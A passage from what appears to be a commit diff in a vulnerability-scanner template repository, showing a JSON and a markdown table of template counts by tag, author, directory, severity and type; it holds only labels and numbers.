ount":4},{"name":"elastic","count":4},{"name":"webserver","count":4},{"name":"grafana","count":4},{"name":"moodle","count":4},{"name":"exchange","count":4},{"name":"firmware","count":4},{"name":"thinkphp","count":4},{"name":"hongdian","count":4},{"name":"magmi","count":4},{"name":"deserialization","count":4},{"name":"samsung","count":4},{"name":"glpi","count":4},{"name":"artifactory","count":4},{"name":"symfony","count":4},{"name":"fanruan","count":3},{"name":"caucho","count":3},{"name":"lfr","count":3},{"name":"opensis","count":3},{"name":"amazon","count":3},{"name":"openssh","count":3},{"name":"bypass","count":3},{"name":"kevinlab","count":3},{"name":"slack","count":3},{"name":"intrusive","count":3},{"name":"backups","count":3},{"name":"nexus","count":3},{"name":"httpd","count":3},{"name":"kubernetes","count":3},{"name":"oa","count":3},{"name":"mongodb","count":3},{"name":"vbulletin","count":3},{"name":"nacos","count":3},{"name":"ebs","count":3},{"name":"terramaster","count":3},{"name":"targa","count":3},{"name":"kafka","count":3},{"name":"bitrix","count":3},{"name":"microstrategy","count":3},{"name":"ssh","count":3},{"name":"zabbix","count":3},{"name":"zhiyuan","count":3},{"name":"ofbiz","count":3},{"name":"resin","count":3},{"name":"log","count":3},{"name":"tikiwiki","count":3},{"name":"springcloud","count":3},{"name":"r-seenet","count":3},{"name":"git","count":3},{"name":"fpd","count":3},{"name":"itop","count":3},{"name":"nosqli","count":3},{"name":"jellyfin","count":2},{"name":"chamilo","count":2},{"name":"strapi","count":2},{"name":"igs","count":2},{"name":"showdoc","count":2},{"name":"voipmonitor","count":2},{"name":"wordfence","count":2},{"name":"smtp","count":2},{"name":"axis2","count":2},{"name":"frp","count":2},{"name":"mail","count":2},{"name":"splunk","count":2},{"name":"kentico","count":2},{"name":"emerge","count":2},{"name":"prestashop","count":2},{"name":"trixbox","count":2},{"name":"saltstack","count":2},{"name":"rockethchat","count":2},{"name":"ec2","count":2},{"name":"hjtcloud","count":2},{"name":"maian","count":2},{"name":"bigip","count":2},{"name":"cve2005","count":2},{"name":"chiyu","count":2},{"name":"odoo","count":2},{"name":"mida","count":2},{"name":"openfire","count":2},{"name":"service","count":2},{"name":"sharepoint","count":2},{"name":"yapi","count":2},{"name":"horde","count":2},{"name":"vrealize","count":2},{"name":"webcam","count":2},{"name":"akkadian","count":2},{"name":"flir","count":2},{"name":"avantfax","count":2},{"name":"xxljob","count":2},{"name":"hasura","count":2},{"name":"axis","count":2},{"name":"dolibarr","count":2},{"name":"nextjs","count":2},{"name":"ucmdb","count":2},{"name":"azure","count":2},{"name":"oauth","count":2},{"name":"hashicorp","count":2},{"name":"ecology","count":2},{"name":"huawei","count":2},{"name":"fortios","count":2},{"name":"jboss","count":2},{"name":"jsf","count":2},{"name":"nagios","count":2},{"name":"guacamole","count":2},{"name":"keycloak","count":2},{"name":"rstudio","count":2},{"name":"firebase","count":2},{"name":"kibana","count":2},{"name":"jeedom","count":2},{"name":"leak","count":2},{"name":"paloalto","count":2},{"name":"hpe","count":2},{"name":"couchdb","count":2},{"name":"middleware","count":2},{"name":"telerik","count":2},{"name":"shellshock","count":2},{"name":"phpcollab","count":2},{"name":"github","count":2},{"name":"mcafee","count":2},{"name":"prometheus","count":2},{"name":"natshell","count":2},{"name":"seeyon","count":2},{"name":"grav","count":2},{"name":"glassfish","count":2},{"name":"proxy","count":2},{"name":"hoteldruid","count":2},{"name":"geowebserver","count":2},{"name":"backdoor","count":2},{"name":"status","count":2},{"name":"sonarqube","count":2},{"name":"plesk","count":2},{"name":"sonicwall","count":2},{"name":"akamai","count":2},{"name":"linkerd","count":2},{"name":"injection","count":2},{"name":"globalprotect","count":2},{"name":"waf","count":2},{"name":"openam","count":2},{"name":"idrac","count":2},{"name":"spark","count":2},{"name":"smb","count":2},{"name":"icewarp","count":2},{"name":"cve2007","count":2},{"name":"rockmongo","count":2},{"name":"activemq","count":2},{"name":"pega","count":2},{"name":"cache","count":2},{"name":"netis","count":2},{"name":"dos","count":2},{"name":"bigbluebutton","count":1},{"name":"cacti","count":1},{"name":"b2evolution","count":1},{"name":"clave","count":1},{"name":"fastapi","count":1},{"name":"smartblog","count":1},{"name":"alibaba","count":1},{"name":"tongda","count":1},{"name":"zend","count":1},{"name":"api-manager","count":1},{"name":"zcms","count":1},{"name":"shopxo","count":1},{"name":"ns","count":1},{"name":"xdcms","count":1},{"name":"codemeter","count":1},{"name":"appweb","count":1},{"name":"rubedo","count":1},{"name":"vsftpd","count":1},{"name":"upload","count":1},{"name":"alertmanager","count":1},{"name":"argussurveillance","count":1},{"name":"sceditor","count":1},{"name":"chevereto","count":1},{"name":"expressjs","count":1},{"name":"empirecms","count":1},{"name":"goahead","count":1},{"name":"apiman","count":1},{"name":"nuuo","count":1},{"name":"dotnetnuke","count":1},{"name":"redcap","count":1},{"name":"panos","count":1},{"name":"ricoh","count":1},{"name":"javamelody","count":1},{"name":"xmlchart","count":1},{"name":"cgi","count":1},{"name":"smi","count":1},{"name":"trilithic","count":1},{"name":"lighttpd","count":1},{"name":"klog","count":1},{"name":"pulsesecure","count":1},{"name":"kafdrop","count":1},{"name":"selea","count":1},{"name":"sco","count":1},{"name":"zmanda","count":1},{"name":"getsimple","count":1},{"name":"openx","count":1},{"name":"adminer","count":1},{"name":"idemia","count":1},{"name":"timesheet","count":1},{"name":"sarg","count":1},{"name":"landray","count":1},{"name":"flink","count":1},{"name":"lanproxy","count":1},{"name":"circontrol","count":1},{"name":"ruby","count":1},{"name":"opensmtpd","count":1},{"name":"default","count":1},{"name":"ewebs","count":1},{"name":"rmc","count":1},{"name":"whm","count":1},{"name":"tracer","count":1},{"name":"camera","count":1},{"name":"lg-nas","count":1},{"name":"resourcespace","count":1},{"name":"comodo","count":1},{"name":"xiuno","count":1},{"name":"ambari","count":1},{"name":"zm","count":1},{"name":"froxlor","count":1},{"name":"clockwatch","count":1},{"name":"st","count":1},{"name":"mysql","count":1},{"name":"pippoint","count":1},{"name":"parentlink","count":1},{"name":"openerp","count":1},{"name":"linux","count":1},{"name":"ilo4","count":1},{"name":"camunda","count":1},{"name":"rujjie","count":1},{"name":"servicedesk","count":1},{"name":"jnoj","count":1},{"name":"acexy","count":1},{"name":"phpfusion","count":1},{"name":"redhat","count":1},{"name":"octobercms","count":1},{"name":"xvr","count":1},{"name":"phpinfo","count":1},{"name":"fortigates","count":1},{"name":"opm","count":1},{"name":"kong","count":1},{"name":"yii","count":1},{"name":"triconsole","count":1},{"name":"vnc","count":1},{"name":"clickhouse","count":1},{"name":"bash","count":1},{"name":"webui","count":1},{"name":"huijietong","count":1},{"name":"codeigniter","count":1},{"name":"cocoon","count":1},{"name":"memcached","count":1},{"name":"circontrorl","count":1},{"name":"visualtools","count":1},{"name":"domxss","count":1},{"name":"node-red-dashboard","count":1},{"name":"sourcebans","count":1},{"name":"clink-office","count":1},{"name":"scimono","count":1},{"name":"auth","count":1},{"name":"pyramid","count":1},{"name":"csrf","count":1},{"name":"dom","count":1},{"name":"vscode","count":1},{"name":"socomec","count":1},{"name":"eyelock","count":1},{"name":"74cms","count":1},{"name":"duomicms","count":1},{"name":"svnserve","count":1},{"name":"discord","count":1},{"name":"bolt","count":1},{"name":"acontent","count":1},{"name":"tika","count":1},{"name":"concrete","count":1},{"name":"zookeeper","count":1},{"name":"aruba","count":1},{"name":"enum","count":1},{"name":"flash","count":1},{"name":"zeroshell","count":1},{"name":"nedi","count":1},{"name":"adb","count":1},{"name":"commax","count":1},{"name":"ulterius","count":1},{"name":"opensns","count":1},{"name":"fuelcms","count":1},{"name":"apos","count":1},{"name":"nomad","count":1},{"name":"livezilla","count":1},{"name":"robomongo","count":1},{"name":"payara","count":1},{"name":"redis","count":1},{"name":"thinkadmin","count":1},{"name":"monitorix","count":1},{"name":"aura","count":1},{"name":"jsp","count":1},{"name":"javafaces","count":1},{"name":"myucms","count":1},{"name":"mautic","count":1},{"name":"mirai","count":1},{"name":"expose","count":1},{"name":"stem","count":1},{"name":"xunchi","count":1},{"name":"acme","count":1},{"name":"qcubed","count":1},{"name":"ioncube","count":1},{"name":"proftpd","count":1},{"name":"iptime","count":1},{"name":"phpfastcache","count":1},{"name":"fortiweb","count":1},{"name":"nsasg","count":1},{"name":"2014","count":1},{"name":"rdp","count":1},{"name":"manageengine","count":1},{"name":"centos","count":1},{"name":"announcekit","count":1},{"name":"dvwa","count":1},{"name":"monitorr","count":1},{"name":"cherokee","count":1},{"name":"phpunit","count":1},{"name":"servicenow","count":1},{"name":"glances","count":1},{"name":"fedora","count":1},{"name":"mdb","count":1},{"name":"exponentcms","count":1},{"name":"geutebruck","count":1},{"name":"dompdf","count":1},{"name":"trane","count":1},{"name":"lotuscms","count":1},{"name":"springframework","count":1},{"name":"crm","count":1},{"name":"extractor","count":1},{"name":"plastic","count":1},{"name":"nc2","count":1},{"name":"processmaker","count":1},{"name":"moin","count":1},{"name":"nps","count":1},{"name":"websvn","count":1},{"name":"sophos","count":1},{"name":"cobub","count":1},{"name":"weiphp","count":1},{"name":"solman","count":1},{"name":"ssl","count":1},{"name":"alerta","count":1},{"name":"jquery","count":1},{"name":"chinaunicom","count":1},{"name":"spectracom","count":1},{"name":"netrc","count":1},{"name":"tapestry","count":1},{"name":"blue-ocean","count":1},{"name":"ueditor","count":1},{"name":"accela","count":1},{"name":"nweb2fax","count":1},{"name":"faraday","count":1},{"name":"keenetic","count":1},{"name":"salesforce","count":1},{"name":"totaljs","count":1},{"name":"hortonworks","count":1},{"name":"ems","count":1},{"name":"upnp","count":1},{"name":"bitly","count":1},{"name":"uwsgi","count":1},{"name":"kubeflow","count":1},{"name":"tectuus","count":1},{"name":"enumeration","count":1},{"name":"rabbitmq","count":1},{"name":"ilo","count":1},{"name":"varnish","count":1},{"name":"plugin","count":1},{"name":"majordomo2","count":1},{"name":"anchorcms","count":1},{"name":"logontracer","count":1},{"name":"labtech","count":1},{"name":"mantis","count":1},{"name":"sureline","count":1},{"name":"traefik","count":1},{"name":"wuzhicms","count":1},{"name":"phalcon","count":1},{"name":"pacsone","count":1},{"name":"mongoshake","count":1},{"name":"spf","count":1},{"name":" default-login","count":1},{"name":"oneblog","count":1},{"name":"azkaban","count":1},{"name":"geddy","count":1},{"name":"zte","count":1},{"name":"sitecore","count":1},{"name":"k8","count":1},{"name":"oscommerce","count":1},{"name":"bruteforce","count":1},{"name":"owasp","count":1},{"name":"mariadb","count":1},{"name":"db","count":1},{"name":"gotmls","count":1},{"name":"portainer","count":1},{"name":"grails","count":1},{"name":"webmodule-ee","count":1},{"name":"office365","count":1},{"name":"pgadmin","count":1},{"name":"magicflow","count":1},{"name":"jitsi","count":1},{"name":"cyberoam","count":1},{"name":"couchbase","count":1},{"name":"visionhub","count":1},{"name":"postgres","count":1},{"name":"beanshell","count":1},{"name":"razor","count":1},{"name":"emby","count":1},{"name":"sqlite","count":1},{"name":"diris","count":1},{"name":"openstack","count":1},{"name":"yealink","count":1},{"name":"tjws","count":1},{"name":"metinfo","count":1},{"name":"exposures","count":1},{"name":"openrestry","count":1},{"name":"jeewms","count":1},{"name":"lansweeper","count":1},{"name":"calendarix","count":1},{"name":"nexusdb","count":1},{"name":"webmin","count":1},{"name":"mobileiron","count":1},{"name":"netsweeper","count":1},{"name":"ecom","count":1},{"name":"embedthis","count":1},{"name":"commscope","count":1},{"name":"opencast","count":1},{"name":"esmtp","count":1},{"name":"dbeaver","count":1},{"name":"plone","count":1},{"name":"wazuh","count":1},{"name":"hiboss","count":1},{"name":"biometrics","count":1},{"name":"kyan","count":1},{"name":"jfrog","count":1},{"name":"javascript","count":1},{"name":"wildfly","count":1},{"name":"cerebro","count":1},{"name":"checkpoint","count":1},{"name":"dvr","count":1},{"name":"eprints","count":1},{"name":"zenario","count":1},{"name":"wiki","count":1},{"name":"xml","count":1},{"name":"ruckus","count":1},{"name":"ntopng","count":1},{"name":"cloudflare","count":1},{"name":"interlib","count":1},{"name":"feifeicms","count":1},{"name":"rhymix","count":1},{"name":"zzzcms","count":1},{"name":"linkedin","count":1},{"name":"svn","count":1},{"name":"hadoop","count":1},{"name":"fastcgi","count":1},{"name":"maccmsv10","count":1},{"name":"cors","count":1},{"name":"fortigate","count":1},{"name":"redwood","count":1},{"name":"solarlog","count":1},{"name":"darkstat","count":1},{"name":"sprintful","count":1},{"name":"plc","count":1},{"name":"k8s","count":1},{"name":"sidekiq","count":1},{"name":"gateone","count":1},{"name":"emc","count":1},{"name":"qvisdvr","count":1},{"name":"timeclock","count":1},{"name":"zarafa","count":1},{"name":"gloo","count":1},{"name":"etouch","count":1},{"name":"fortinet","count":1},{"name":"skywalking","count":1},{"name":"linksys","count":1},{"name":"netgenie","count":1},{"name":"spring","count":1},{"name":"csod","count":1},{"name":"lutron","count":1},{"name":"node","count":1},{"name":"fiori","count":1},{"name":"wamp","count":1},{"name":"yachtcontrol","count":1},{"name":"landrayoa","count":1},{"name":"pcoip","count":1},{"name":"tensorboard","count":1},{"name":"floc","count":1},{"name":"rmi","count":1},{"name":"avtech","count":1},{"name":"netdata","count":1},{"name":"bullwark","count":1},{"name":"h3c-imc","count":1},{"name":"mpsec","count":1},{"name":"blackboard","count":1},{"name":"tieline","count":1},{"name":"nette","count":1},{"name":"sentry","count":1},{"name":"sangfor","count":1},{"name":"primetek","count":1},{"name":"seacms","count":1},{"name":"tenda","count":1},{"name":"szhe","count":1},{"name":"jenzabar","count":1},{"name":"avalanche","count":1},{"name":"blind","count":1},{"name":"rsyncd","count":1},{"name":"jmx","count":1},{"name":"opentsdb","count":1},{"name":"qdpm","count":1},{"name":"wavemaker","count":1},{"name":"smartsense","count":1},{"name":"email","count":1},{"name":"panabit","count":1},{"name":"mantisbt","count":1},{"name":"sgp","count":1},{"name":"scs","count":1},{"name":"postmessage","count":1},{"name":"vsphere","count":1},{"name":"heroku","count":1},{"name":"pagespeed","count":1},{"name":"ganglia","count":1},{"name":"sage","count":1},{"name":"xff","count":1},{"name":"wmt","count":1},{"name":"favicon","count":1},{"name":"viewlinc","count":1},{"name":"miscrsoft","count":1},{"name":"simplecrm","count":1},{"name":"subrion","count":1},{"name":"influxdb","count":1},{"name":"krweb","count":1},{"name":"zyxel","count":1},{"name":"turbocrm","count":1},{"name":"gogs","count":1},{"name":"rfi","count":1},{"name":"lancom","count":1},{"name":"druid","count":1},{"name":"discourse","count":1},{"name":"eyou","count":1},{"name":"owa","count":1},{"name":"drone","count":1},{"name":"iceflow","count":1},{"name":"arl","count":1},{"name":"octoprint","count":1},{"name":"twitter-server","count":1},{"name":"openemr","count":1},{"name":"synnefo","count":1},{"name":"spidercontrol","count":1},{"name":"qsan","count":1},{"name":"cve2006","count":1},{"name":"dotnet","count":1},{"name":"achecker","count":1},{"name":"cofax","count":1},{"name":"gitlist","count":1},{"name":"tamronos","count":1},{"name":"moinmoin","count":1},{"name":"powercreator","count":1},{"name":"wondercms","count":1},{"name":"wifisky","count":1},{"name":"saltapi","count":1},{"name":"realteo","count":1},{"name":"tensorflow","count":1},{"name":"mara","count":1},{"name":"tileserver","count":1},{"name":"addpac","count":1},{"name":"npm","count":1},{"name":"bookstack","count":1},{"name":"perl","count":1},{"name":"webftp","count":1},{"name":"kerbynet","count":1},{"name":"asus","count":1},{"name":"tpshop","count":1},{"name":"soar","count":1},{"name":"haproxy","count":1},{"name":"starttls","count":1},{"name":"gespage","count":1},{"name":"liferay","count":1},{"name":"optiLink","count":1},{"name":"swagger","count":1},{"name":"centreon","count":1},{"name":"webadmin","count":1},{"name":"jenkin","count":1},{"name":"wooyun","count":1},{"name":"setup","count":1},{"name":"ghost","count":1},{"name":"cloudinary","count":1},{"name":"nuxeo","count":1},{"name":"episerver","count":1},{"name":"mediumish","count":1},{"name":"bedita","count":1},{"name":"finereport","count":1},{"name":"erp-nc","count":1},{"name":"dotclear","count":1},{"name":"clusterengine","count":1},{"name":"htmli","count":1},{"name":"cse","count":1},{"name":"mailchimp","count":1},{"name":"doh","count":1},{"name":"exacqvision","count":1},{"name":"wing-ftp","count":1},{"name":"bazarr","count":1},{"name":"shopware","count":1},{"name":"sar2html","count":1},{"name":"mongo","count":1},{"name":"viewpoint","count":1},{"name":"aspnuke","count":1},{"name":"expn","count":1},{"name":"spip","count":1},{"name":"woocomernce","count":1},{"name":"wavlink","count":1},{"name":"ssltls","count":1},{"name":"harbor","count":1},{"name":"fortilogger","count":1},{"name":"dnssec","count":1},{"name":"nordex","count":1},{"name":"gridx","count":1}],"authors":[{"name":"dhiyaneshdk","count":245},{"name":"pikpikcu","count":244},{"name":"pdteam","count":198},{"name":"daffainfo","count":176},{"name":"geeknik","count":149},{"name":"dwisiswant0","count":132},{"name":"gy741","count":72},{"name":"madrobot","count":62},{"name":"princechaddha","count":54},{"name":"pussycat0x","count":48},{"name":"gaurang","count":42},{"name":"ice3man","count":26},{"name":"organiccrap","count":24},{"name":"0x_akoko","count":24},{"name":"philippedelteil","count":19},{"name":"sheikhrishad","count":15},{"name":"milo2012","count":14},{"name":"pr3r00t","count":13},{"name":"techbrunchfr","count":13},{"name":"suman_kar","count":12},{"name":"cyllective","count":11},{"name":"r3dg33k","count":11},{"name":"righettod","count":10},{"name":"random_robbie","count":10},{"name":"wdahlenb","count":9},{"name":"nadino","count":9},{"name":"hackergautam","count":9},{"name":"melbadry9","count":9},{"name":"iamthefrogy","count":8},{"name":"aashiq","count":8},{"name":"that_juan_","count":8},{"name":"dogasantos","count":7},{"name":"emadshanab","count":7},{"name":"0x240x23elu","count":7},{"name":"techryptic (@tech)","count":7},{"name":"dr_set","count":7},{"name":"harshbothra_","count":7},{"name":"kophjager007","count":7},{"name":"randomstr1ng","count":7},{"name":"oppsec","count":7},{"name":"puzzlepeaches","count":6},{"name":"__fazal","count":6},{"name":"meme-lord","count":6},{"name":"caspergn","count":6},{"name":"rootxharsh","count":5},{"name":"joanbono","count":5},{"name":"pentest_swissky","count":5},{"name":"iamnoooob","count":5},{"name":"ganofins","count":5},{"name":"logicalhunter","count":5},{"name":"elsfa7110","count":5},{"name":"yanyun","count":5},{"name":"panch0r3d","count":5},{"name":"xelkomy","count":4},{"name":"e_schultze_","count":4},{"name":"nodauf","count":4},{"name":"github.com/its0x08","count":4},{"name":"jarijaas","count":3},{"name":"mavericknerd","count":3},{"name":"shifacyclewala","count":3},{"name":"incogbyte","count":3},{"name":"lu4nx","count":3},{"name":"fyoorer","count":3},{"name":"z3bd","count":3},{"name":"dudez","count":3},{"name":"tess","count":3},{"name":"binaryfigments","count":3},{"name":"vsh00t","count":3},{"name":"0w4ys","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"_generic_human_","count":3},{"name":"shine","count":3},{"name":"emenalf","count":3},{"name":"f1tz","count":3},{"name":"impramodsargar","count":3},{"name":"thomas_from_offensity","count":3},{"name":"alifathi-h1","count":2},{"name":"random-robbie","count":2},{"name":"kiblyn11","count":2},{"name":"udit_thakkur","count":2},{"name":"afaq","count":2},{"name":"nkxxkn","count":2},{"name":"x1m_martijn","count":2},{"name":"pxmme1337","count":2},{"name":"unstabl3","count":2},{"name":"cocxanh","count":2},{"name":"hahwul","count":2},{"name":"amsda","count":2},{"name":"dheerajmadhukar","count":2},{"name":"swissky","count":2},{"name":"0xprial","count":2},{"name":"bing0o","count":2},{"name":"joeldeleep","count":2},{"name":"bp0lr","count":2},{"name":"gal nagli","count":2},{"name":"whoever","count":2},{"name":"w4cky_","count":2},{"name":"gevakun","count":2},{"name":"foulenzer","count":2},{"name":"davidmckennirey","count":2},{"name":"moritz nentwig","count":2},{"name":"vavkamil","count":2},{"name":"manas_harsh","count":2},{"name":"parth","count":2},{"name":"0xelkomy","count":2},{"name":"zomsop82","count":2},{"name":"ehsahil","count":2},{"name":"0xcrypto","count":2},{"name":"sushantkamble","count":2},{"name":"randomrobbie","count":2},{"name":"fabaff","count":2},{"name":"hetroublemakr","count":2},{"name":"0xsapra","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"bsysop","count":2},{"name":"koti2","count":2},{"name":"lotusdll","count":2},{"name":"ree4pwn","count":2},{"name":"0xrudra","count":2},{"name":"arcc","count":2},{"name":"mohammedsaneem","count":2},{"name":"berkdusunur","count":1},{"name":"borna nematzadeh","count":1},{"name":"intx0x80","count":1},{"name":"fopina","count":1},{"name":"micha3lb3n","count":1},{"name":"rodnt","count":1},{"name":"kareemse1im","count":1},{"name":"alph4byt3","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"geraldino2","count":1},{"name":"me9187","count":1},{"name":"makyotox","count":1},{"name":"cookiehanhoan","count":1},{"name":"pratik khalane","count":1},{"name":"manuelbua","count":1},{"name":"_darrenmartyn","count":1},{"name":"revblock","count":1},{"name":"schniggie","count":1},{"name":"tirtha_mandal","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"petruknisme","count":1},{"name":"mubassirpatel","count":1},{"name":"ooooooo_q","count":1},{"name":"d0rkerdevil","count":1},{"name":"huowuzhao","count":1},{"name":"furkansenan","count":1},{"name":"thevillagehacker","count":1},{"name":"sy3omda","count":1},{"name":"0h1in9e","count":1},{"name":"kabirsuda","count":1},{"name":"bernardofsr","count":1},{"name":"flag007","count":1},{"name":"soyelmago","count":1},{"name":"exploitation","count":1},{"name":"toufik airane","count":1},{"name":"luci","count":1},{"name":"hanlaomo","count":1},{"name":"udyz","count":1},{"name":"thezakman","count":1},{"name":"b4uh0lz","count":1},{"name":"ahmed sherif","count":1},{"name":"chron0x","count":1},{"name":"ilovebinbash","count":1},{"name":"johnk3r","count":1},{"name":"_c0wb0y_","count":1},{"name":"alperenkesk","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"whynotke","count":1},{"name":"becivells","count":1},{"name":"jteles","count":1},{"name":"retr0","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"s1r1u5_","count":1},{"name":"affix","count":1},{"name":"0xteles","count":1},{"name":"co0nan","count":1},{"name":"juicypotato1","count":1},{"name":"streetofhackerr007","count":1},{"name":"yashanand155","count":1},{"name":"adrianmf","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"52971","count":1},{"name":"akshansh","count":1},{"name":"r3naissance","count":1},{"name":"deena","count":1},{"name":"ohlinge","count":1},{"name":"0xrod","count":1},{"name":"idealphase","count":1},{"name":"convisoappsec","count":1},{"name":"zandros0","count":1},{"name":"luskabol","count":1},{"name":"naglinagli","count":1},{"name":"0xtavian","count":1},{"name":"regala_","count":1},{"name":"absshax","count":1},{"name":"aresx","count":1},{"name":"zhenwarx","count":1},{"name":"sickwell","count":1},{"name":"andirrahmani1","count":1},{"name":"taielab","count":1},{"name":"ldionmarcil","count":1},{"name":"th3.d1p4k","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"daviey","count":1},{"name":"philippdelteil","count":1},{"name":"dawid czarnecki","count":1},{"name":"hakluke","count":1},{"name":"divya_mudgal","count":1},{"name":"shelld3v","count":1},{"name":"b0yd","count":1},{"name":"johnjhacking","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"ringo","count":1},{"name":"shifacyclewla","count":1},{"name":"mah3sec_","count":1},{"name":"pdp","count":1},{"name":"mesaglio","count":1},{"name":"g4l1t0","count":1},{"name":"un-fmunozs","count":1},{"name":"yavolo","count":1},{"name":"omarkurt","count":1},{"name":"willd96","count":1},{"name":"elmahdi","count":1},{"name":"ipanda","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"noamrathaus","count":1},{"name":"rtcms","count":1},{"name":"alex","count":1},{"name":"defr0ggy","count":1},{"name":"infosecsanyam","count":1},{"name":"notsoevilweasel","count":1},{"name":"fmunozs","count":1},{"name":"@github.com/defr0ggy","count":1},{"name":"qlkwej","count":1},{"name":"yashgoti","count":1},{"name":"nytr0gen","count":1},{"name":"mhdsamx","count":1},{"name":"tim_koopmans","count":1},{"name":"rojanrijal","count":1},{"name":"iampritam","count":1},{"name":"its0x08","count":1},{"name":"sullo","count":1},{"name":"g4l1t0 and @convisoappsec","count":1},{"name":"abison_binoy","count":1},{"name":"pudsec","count":1},{"name":"remonsec","count":1},{"name":"_harleo","count":1},{"name":"sicksec","count":1},{"name":"bolli95","count":1},{"name":"knassar702","count":1},{"name":"ajaysenr","count":1},{"name":"0ut0fb4nd","count":1},{"name":"bad5ect0r","count":1},{"name":"kre80r","count":1},{"name":"bjhulst","count":1},{"name":"raesene","count":1},{"name":"sshell","count":1},{"name":"kurohost","count":1},{"name":"patralos","count":1},{"name":"elder tao","count":1},{"name":"c3l3si4n","count":1},{"name":"j33n1k4","count":1},{"name":"@dwisiswant0","count":1},{"name":"mass0ma","count":1},{"name":"smaranchand","count":1},{"name":"evolutionsec","count":1},{"name":"jeya seelan","count":1},{"name":"apt-mirror","count":1},{"name":"wabafet","count":1},{"name":"vzamanillo","count":1},{"name":"akash.c","count":1},{"name":"b0rn2r00t","count":1},{"name":"sec_hawk","count":1},{"name":"undefl0w","count":1},{"name":"andysvints","count":1},{"name":"blckraven","count":1},{"name":"gboddin","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"shreyapohekar","count":1}],"directory":[{"name":"cves","count":657},{"name":"vulnerabilities","count":284},{"name":"exposed-panels","count":235},{"name":"exposures","count":185},{"name":"technologies","count":164},{"name":"misconfiguration","count":125},{"name":"takeovers","count":71},{"name":"default-logins","count":52},{"name":"file","count":46},{"name":"workflows","count":35},{"name":"network","count":30},{"name":"miscellaneous","count":28},{"name":"iot","count":23},{"name":"dns","count":11},{"name":"cnvd","count":9},{"name":"fuzzing","count":9},{"name":"headless","count":5},{"name":".pre-commit-config.yaml","count":1}],"severity":[{"name":"info","count":610},{"name":"high","count":526},{"name":"medium","count":406},{"name":"critical","count":232},{"name":"low","count":160}],"types":[{"name":"http","count":1833},{"name":"file","count":46},{"name":"network","count":39},{"name":"dns","count":11}]} diff --git a/TEMPLATES-STATS.md b/TEMPLATES-STATS.md index 36506e5b4e..30f542f672 100644 --- a/TEMPLATES-STATS.md +++ b/TEMPLATES-STATS.md @@ -1,736 +1,741 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |--------------------|-------|--------------------------------|-------|-------------------------|-------|----------|-------|---------|-------| -| cve | 632 | dhiyaneshdk | 245 | cves | 640 | info | 603 | http | 1807 | -| panel | 232 | pikpikcu | 244 | vulnerabilities | 283 | high | 510 | file | 46 | -| xss | 224 | pdteam | 198 | exposed-panels | 231 | medium | 402 | network | 38 | -| exposure | 214 | daffainfo | 164 | exposures | 184 | critical | 232 | dns | 11 | -| lfi | 207 | geeknik | 149 | technologies | 163 | low | 160 | | | -| wordpress | 203 | dwisiswant0 | 132 | misconfiguration | 125 | | | | | -| rce | 189 | gy741 | 72 | takeovers | 71 | | | | | -| cve2020 | 157 | madrobot | 62 | default-logins | 51 | | | | | -| wp-plugin | 136 | princechaddha | 54 | file | 46 | | | | | -| tech | 105 | pussycat0x | 44 | workflows | 35 | | | | | -| cve2021 | 104 | gaurang | 42 | network | 29 | | | | | -| config | 93 | ice3man | 26 | miscellaneous | 27 | | | | | -| cve2019 | 90 | organiccrap | 24 | iot | 23 | | | | | -| cve2018 | 79 | 0x_akoko | 23 | dns | 11 | | | | | -| takeover | 74 | philippedelteil | 19 | cnvd | 9 | | | | | -| | 66 | sheikhrishad | 15 | fuzzing | 9 | | | | | -| apache | 64 | milo2012 | 14 | headless | 5 | | | | | -| token | 64 | pr3r00t | 13 | .pre-commit-config.yaml | 1 | | | | | -| default-login | 57 | techbrunchfr | 13 | | | | | | | +| cve | 649 | dhiyaneshdk | 245 | cves | 657 | info | 610 | http | 1833 | +| panel | 236 | pikpikcu | 244 | vulnerabilities | 284 | high | 526 | file | 46 | +| xss | 224 | pdteam | 198 | exposed-panels | 235 | medium | 406 | network | 39 | +| lfi | 221 | daffainfo | 176 | exposures | 185 | critical | 232 | dns | 11 | +| exposure | 217 | geeknik | 149 | technologies | 164 | low | 160 | | | +| wordpress | 205 | dwisiswant0 | 132 | misconfiguration | 125 | | | | | +| rce | 190 | gy741 | 72 | takeovers | 71 | | | | | +| cve2020 | 157 | madrobot | 62 | default-logins | 52 | | | | | +| wp-plugin | 138 | princechaddha | 54 | file | 46 | | | | | +| cve2021 | 106 | pussycat0x | 48 | workflows | 35 | | | | | +| tech | 106 | gaurang | 42 | network | 30 | | | | | +| config | 93 | ice3man | 26 | miscellaneous | 28 | | | | | +| cve2019 | 91 | organiccrap | 24 | iot | 23 | | | | | +| cve2018 | 80 | 0x_akoko | 24 | dns | 11 | | | | | +| takeover | 74 | philippedelteil | 19 | fuzzing | 9 | | | | | +| | 66 | sheikhrishad | 15 | cnvd | 9 | | | | | +| apache | 66 | milo2012 | 14 | headless | 5 | | | | | +| token | 64 | techbrunchfr | 13 | .pre-commit-config.yaml | 1 | | | | | +| default-login | 58 | pr3r00t | 13 | | | | | | | | iot | 56 | suman_kar | 12 | | | | | | | -| cve2017 | 48 | cyllective | 11 | | | | | | | -| file | 46 | r3dg33k | 11 | | | | | | | -| oob | 45 | random_robbie | 10 | | | | | | | -| unauth | 45 | righettod | 10 | | | | | | | -| joomla | 40 | hackergautam | 9 | | | | | | | -| network | 38 | wdahlenb | 9 | | | | | | | +| joomla | 52 | cyllective | 11 | | | | | | | +| cve2017 | 48 | r3dg33k | 11 | | | | | | | +| file | 46 | righettod | 10 | | | | | | | +| unauth | 45 | random_robbie | 10 | | | | | | | +| oob | 45 | wdahlenb | 9 | | | | | | | +| cve2010 | 44 | hackergautam | 9 | | | | | | | +| network | 39 | nadino | 9 | | | | | | | | sqli | 37 | melbadry9 | 9 | | | | | | | -| ssrf | 32 | nadino | 